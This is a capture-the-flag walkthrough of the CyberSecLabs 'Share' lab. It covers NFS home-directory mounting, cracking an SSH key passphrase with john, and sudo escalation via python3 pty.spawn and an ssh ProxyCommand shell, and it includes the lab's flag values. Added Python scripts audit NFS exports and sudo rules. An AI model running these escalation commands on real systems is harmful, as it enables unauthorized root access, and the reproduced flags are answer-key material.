csl-share-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play CyberSecLabs Share at https://www.cyberseclabs.co.uk/labs/beginner-labs

Tasks

NMAP ENUM

kali@kali:~/cyberseclabs$ sudo nmap -p- 172.31.1.7
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-24 09:49 EDT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 172.31.1.7
Host is up (0.10s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
27853/tcp open unknown -> ssh
34971/tcp open unknown
36663/tcp open unknown
50727/tcp open unknown
56401/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 621.71 seconds

RPC ENUM

kali@kali:~/cyberseclabs$ mkdir /tmp/amir
kali@kali:~/cyberseclabs$ sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir
[sudo] password for kali:kali
kali@kali:~/cyberseclabs$ cd /tmp/amir
kali@kali:/tmp/amir$ ls -la
total 40
drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 .
drwxrwxrwt 14 root root 4096 Jun 25 10:01 ..
-rw-r--r-- 1 kali kali 0 Apr 2 11:46 .bash_history
-rw-r--r-- 1 kali kali 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 kali kali 3786 Apr 2 11:46 .bashrc
drw-r--r-- 2 kali kali 4096 Apr 2 10:44 .cache
drw-r--r-- 3 kali kali 4096 Apr 2 10:44 .gnupg
-rw-r--r-- 1 kali kali 807 Apr 4 2018 .profile
drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 .ssh
-rw-r--r-- 1 kali kali 0 Apr 2 10:47 .sudo_as_admin_successful
-rw-r--r-- 1 kali kali 7713 Apr 2 11:43 .viminfo
kali@kali:/tmp/amir$ cd .ssh
kali@kali:/tmp/amir/.ssh$ ls -la
total 24
drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 .
drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 ..
-r-------- 1 kali kali 393 Apr 2 11:12 authorized_keys
-r-------- 1 kali kali 1766 Apr 2 11:11 id_rsa
-rw-r--r-- 1 kali kali 1766 Apr 2 11:20 id_rsa.bak
-r-------- 1 kali kali 393 Apr 2 11:11 id_rsa.pub
kali@kali:/tmp/amir/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,8D55B7449F8965162DA3B7F2F017FC21
(encrypted key body omitted)
-----END RSA PRIVATE KEY-----
kali@kali:/tmp/amir/.ssh$
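What made the step above possible is not a bug in NFS but the export itself: a home directory exported to any client, with client uids honoured, so a Kali box whose local user is uid 1000 reads amir's files (including a mode-400 id_rsa) as their owner. As an added example (my code, not the lab's configuration or the author's), here is a small audit of /etc/exports in exports(5) syntax. The exports file is constructed; the first line reproduces the symptom seen in the lab, the other two show a safe export and a worse one.

```python
"""Audit /etc/exports lines for settings that hand user data to NFS clients.

Added example for this write-up; the exports file below is constructed
(the lab only shows that /home/amir could be mounted from any host and that
its files were readable as the client's own uid 1000).
"""
import re
from dataclasses import dataclass

SAMPLE_EXPORTS = """\
# constructed sample: line 1 reproduces the lab's symptom
/home/amir  *(rw,sync,no_subtree_check)
/srv/public 10.0.0.0/24(ro,sync,all_squash,anonuid=65534)
/srv/build  *(rw,no_root_squash,insecure)
"""

# "host(opt,opt)"; a bare "(opt)" with no host means every client, as in exports(5).
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


@dataclass
class Export:
    path: str
    host: str
    options: frozenset


@dataclass
class Finding:
    export: Export
    code: str
    detail: str


def parse_exports(text):
    """Return one Export per (path, client) pair, comments and blank lines skipped."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:
            m = CLIENT_RE.match(client)
            host = m.group(1) or "*"
            opts = frozenset(o for o in (m.group(2) or "").split(",") if o)
            exports.append(Export(path, host, opts))
    return exports


def audit_exports(text):
    """Flag the export settings that matter for credential exposure."""
    findings = []
    for e in parse_exports(text):
        def add(code, detail, e=e):
            findings.append(Finding(e, code, detail))

        if e.host == "*":
            add("any-client", "no client restriction: any host reaching 2049/tcp may mount it")
        if e.path == "/root" or e.path.startswith("/home"):
            add("home-dir", "home directories hold SSH keys, shell history and credentials")
        if "no_root_squash" in e.options:
            add("no_root_squash", "root on the client is root on the export")
        if "all_squash" not in e.options:
            # This is the lab's failure: uid 1000 on the client == amir on the server.
            add("uid-trusted", "client uids are honoured: a client running as uid N reads uid N's files")
        if "insecure" in e.options:
            add("insecure", "requests from unprivileged source ports are accepted")
        if "rw" in e.options and e.host == "*":
            add("world-writable", "any client can modify the exported files")
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f.export.path:12} {f.export.host:12} {f.code:15} {f.detail}")
```

Run it against a real /etc/exports with `audit_exports(open("/etc/exports").read())`. An export that restricts clients to a subnet, is read-only and uses all_squash (the /srv/public line) produces no findings; the lab's home-directory export produces four.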

CRACK THE ID_RSA PASSPHRASE WITH JOHN

kali@kali:~/cyberseclabs$ python ssh2john.py id_rsa > id_rsa.hash 
kali@kali:~/cyberseclabs$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hello6 (id_rsa)
1g 0:00:00:10 DONE (2020-06-25 10:08) 0.09157g/s 1313Kp/s 1313Kc/s 1313KC/s a6_123..*7¡Vamos!
Session completed
kali@kali:~/cyberseclabs$

SSH CONNECT TO MACHINE WITH ID_RSA
(SSH listens on a non-standard port, 27853)

kali@kali:~/cyberseclabs$ ssh -i id_rsa amir@172.31.1.7 -p 27853
Enter passphrase for key 'id_rsa':hello6
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Jun 25 13:59:46 UTC 2020

System load: 0.0 Processes: 105
Usage of /: 39.2% of 9.78GB Users logged in: 0
Memory usage: 34% IP address for eth0: 172.31.1.7
Swap usage: 0%


21 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Thu Jun 25 13:00:51 2020 from 172.31.249.99
amir@shares:~$

There is no access.txt among amir's files, so try the sudo -l command first.

https://gtfobins.github.io/gtfobins/python/#sudo

amir@shares:/tmp$ sudo -l
Matching Defaults entries for amir on shares:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User amir may run the following commands on shares:
    (ALL : ALL) ALL
    (amy) NOPASSWD: /usr/bin/pkexec
    (amy) NOPASSWD: /usr/bin/python3

amir@shares:/home$ sudo -u amy /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
amy@shares:/home$ ls
amir amy
amy@shares:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Apr 2 15:28 .
drwxr-xr-x 24 root root 4096 Apr 2 14:34 ..
drwxrwxr-x 5 amir amir 4096 Apr 2 15:43 amir
drwxr-xr-- 2 amy amy 4096 Apr 2 15:41 amy
amy@shares:/home$ cd amy
amy@shares:/home/amy$ ls
access.txt
amy@shares:/home/amy$ ls
access.txt
amy@shares:/home/amy$ cat access.txt
dc17a108efc49710e2fd5450c492231c

FOR ROOT ACCESS

https://gtfobins.github.io/gtfobins/ssh/#sudo

amy@shares:/home/amy$ sudo -l
Matching Defaults entries for amy on shares:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User amy may run the following commands on shares:
    (ALL) NOPASSWD: /usr/bin/ssh
amy@shares:/home/amy$ sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# bash
root@shares:/home/amy# cd /root
root@shares:/root# ls -la
total 28
drwx------ 3 root root 4096 Apr 2 15:39 .
drwxr-xr-x 24 root root 4096 Apr 2 14:34 ..
-rw------- 1 root root 78 Apr 2 15:46 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Apr 2 14:43 .ssh
-rw-r--r-- 1 root root 33 Apr 2 15:39 system.txt
root@shares:/root# cat system.txt
b910aca7fe5e6fcb5b0d1554f66c1506
root@shares:/root#
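The whole privilege chain (amir to amy, amy to root) comes from two sudoers rules that each hand over an interpreter or a program with a GTFOBins "sudo" entry, one of them without a password. As an added example (my code, not the author's, the lab's or GTFOBins'), this audit parses the two `sudo -l` listings above, reproduced here as constructed samples, and flags exactly those rules. The SHELL_CAPABLE set is an assumption seeded with the binaries on this page plus the common shells; a real deployment would carry a fuller list.

```python
"""Audit `sudo -l` output for rules that amount to a shell as another account.

Added example for this write-up; the two listings are constructed from the
`sudo -l` output shown on the page. SHELL_CAPABLE is an assumed seed list.
"""
import re
from dataclasses import dataclass
from posixpath import basename

# Binaries whose sudo rule is equivalent to "a shell as the run-as user".
SHELL_CAPABLE = {"sh", "bash", "dash", "python", "python2", "python3", "ssh", "pkexec"}

SUDO_L_AMIR = """\
Matching Defaults entries for amir on shares:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/bin

User amir may run the following commands on shares:
    (ALL : ALL) ALL
    (amy) NOPASSWD: /usr/bin/pkexec
    (amy) NOPASSWD: /usr/bin/python3
"""

SUDO_L_AMY = """\
Matching Defaults entries for amy on shares:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/bin

User amy may run the following commands on shares:
    (ALL) NOPASSWD: /usr/bin/ssh
"""

USER_RE = re.compile(r"^User (\S+) may run the following commands")
# "    (runas_user : runas_group) TAG: TAG: /path/cmd args, /other/cmd"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


@dataclass
class Rule:
    user: str          # who may invoke sudo
    runas_user: str    # target user ("ALL" means any, including root)
    nopasswd: bool
    command: str


@dataclass
class Finding:
    rule: Rule
    issue: str


def parse_sudo_l(text):
    """Return the rules listed after the 'User X may run ...' line."""
    rules, user = [], None
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        if user is None or not line.strip():
            continue           # Defaults lines come before the rules and are skipped
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = [p.strip() for p in m.group("runas").split(":")]
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append(Rule(user, runas[0] or "root", "NOPASSWD" in tags, cmd.strip()))
    return rules


def audit(rules):
    findings = []
    for r in rules:
        how = "without a password" if r.nopasswd else "with the caller's own password"
        if r.command == "ALL":
            findings.append(Finding(r, f"unrestricted: any command as {r.runas_user} {how}"))
            continue
        name = basename(r.command.split()[0])
        if name in SHELL_CAPABLE:
            findings.append(Finding(r, f"shell-capable: {name} yields a shell as {r.runas_user} {how}"))
    return findings


if __name__ == "__main__":
    for listing in (SUDO_L_AMIR, SUDO_L_AMY):
        for f in audit(parse_sudo_l(listing)):
            print(f"{f.rule.user:6} -> {f.rule.command:20} {f.issue}")
```

Reading the two reports together shows the chain a reviewer should care about: amir's rules give a passwordless shell as amy, and amy's single rule gives a passwordless shell as root, so the effective policy is "amir is root" even though amir's own (ALL : ALL) ALL line still asks for a password the attacker did not have. The fix is the usual one: grant specific non-interactive commands with fixed arguments, and never an interpreter, pkexec or ssh.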

Author – Puckiestyle
